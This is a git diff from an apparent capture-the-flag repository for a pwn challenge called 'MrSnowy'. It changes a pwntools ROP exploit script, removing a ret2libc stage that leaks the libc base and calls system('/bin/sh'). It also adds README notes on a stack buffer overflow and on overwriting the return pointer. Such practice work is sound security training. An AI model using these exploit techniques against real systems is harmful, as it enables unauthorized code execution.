diff --git a/pwn/mrsnowy/.gdb_history b/pwn/mrsnowy/.gdb_history
new file mode 100644
index 0000000..fd4eab9
--- /dev/null
+++ b/pwn/mrsnowy/.gdb_history
@@ -0,0 +1,3 @@
+stack
+r
+quit
diff --git a/pwn/mrsnowy/kabuttmache.py b/pwn/mrsnowy/kabuttmache.py
index 72ef5fa..c54bbcc 100755
--- a/pwn/mrsnowy/kabuttmache.py
+++ b/pwn/mrsnowy/kabuttmache.py
@@ -17,7 +17,7 @@ def do_read():
 
 rop = ROP(elf)
 rop.call(elf.symbols['puts'], [elf.got['puts']])
-rop.call(elf.symbols['investigate'])
+rop.call(elf.symbols['deactivate_camera'])
 
 # assemble payload
 payload = [
@@ -32,28 +32,5 @@ do_read()
 
 # send payload
 p.sendline(b''.join(payload))
-puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
-log.info(f'puts found at {hex(puts)}')
 
-# Note:
-# libc database search for puts address: 0x6d31333b315b1b20
-# -> libc6_2.19-18+deb8u10_i386
-# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
-
-libc = ELF("libc6_2.19-18+deb8u10_i386.so")
-libc.address = puts - libc.symbols["puts"]
-log.info(f'libc base address determined {hex(libc.address)}')
-
-rop = ROP(libc)
-rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('exit')
-
-# assemble payload
-payload = [
-    b'\xAA'*offset,
-	rop.chain()
-]
-
-p.sendline(b''.join(payload))
 p.interactive()
diff --git a/pwn/mrsnowy/mr_snowy b/pwn/mrsnowy/mr_snowy
index e57bee2..c5f91ca 100755
Binary files a/pwn/mrsnowy/mr_snowy and b/pwn/mrsnowy/mr_snowy differ
diff --git a/pwn/mrsnowy/Pipfile b/pwn/mrsnowy/mrsnowy.bak/Pipfile
similarity index 100%
rename from pwn/mrsnowy/Pipfile
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile
diff --git a/pwn/mrsnowy/Pipfile.lock b/pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
similarity index 100%
rename from pwn/mrsnowy/Pipfile.lock
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
diff --git a/pwn/mrsnowy/mrsnowy.bak/README.md b/pwn/mrsnowy/mrsnowy.bak/README.md
new file mode 100644
index 0000000..ae9c3d2
--- /dev/null
+++ b/pwn/mrsnowy/mrsnowy.bak/README.md
@@ -0,0 +1,63 @@
+# MrSnowy
+
+There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
+But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
+Something must be wrong with him.
+
+## Flag
+
+Not pwned
+
+## Progress so far
+
+![vulnerable function](images/investigate.png)
+
+- The `read()` reads 0x108 bytes of input from stdin
+  - The buffer is uninitialized
+  - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
+- `checksec --file=mrsnowy` reports NX being enabled
+  - So no shellcode will be placable unless there is executable space
+  - This hints to ROP Chaining
+
+
+![dissasembly of investigate function](images/investigate_disass.png)
+
+- The binary should be patched to get rid of the timetaking animation
+  - Just `nop` the banner() function call using radare2
+- Overwriting the returnpointer of `investigate()` using pwntools:
+
+```python
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+p = process(e.path)
+
+# read banner and stuff until input is requested
+def do_read():
+  while True:
+     ll = p.read()
+     print(ll)
+     if b'>' in ll:
+       break
+
+# if not patched wait for the animation and send 1
+do_read()
+p.sendline('1')
+do_read()
+
+# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+# start the python debugger to get a coredump which is loadable by gdb
+ipdb.set_trace()
+```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```
diff --git a/pwn/mrsnowy/core b/pwn/mrsnowy/mrsnowy.bak/core
similarity index 100%
rename from pwn/mrsnowy/core
rename to pwn/mrsnowy/mrsnowy.bak/core
diff --git a/pwn/mrsnowy/mrsnowy.bak/mr_snowy b/pwn/mrsnowy/mrsnowy.bak/mr_snowy
new file mode 100755
index 0000000..e57bee2
Binary files /dev/null and b/pwn/mrsnowy/mrsnowy.bak/mr_snowy differ
diff --git a/pwn/mrsnowy/pwn.py b/pwn/mrsnowy/mrsnowy.bak/pwn.py
similarity index 100%
rename from pwn/mrsnowy/pwn.py
rename to pwn/mrsnowy/mrsnowy.bak/pwn.py
diff --git a/pwn/mrsnowy/target b/pwn/mrsnowy/mrsnowy.bak/target
similarity index 100%
rename from pwn/mrsnowy/target
rename to pwn/mrsnowy/mrsnowy.bak/target